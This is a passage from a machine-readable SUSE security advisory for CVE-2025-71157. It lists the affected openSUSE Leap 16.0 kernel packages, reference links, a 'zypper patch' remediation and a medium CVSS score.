"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71157",
"url": "https://www.suse.com/security/cve/CVE-2025-71157"
},
{
"category": "external",
"summary": "SUSE Bug 1257168 for CVE-2025-71157",
"url": "https://bugzilla.suse.com/1257168"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
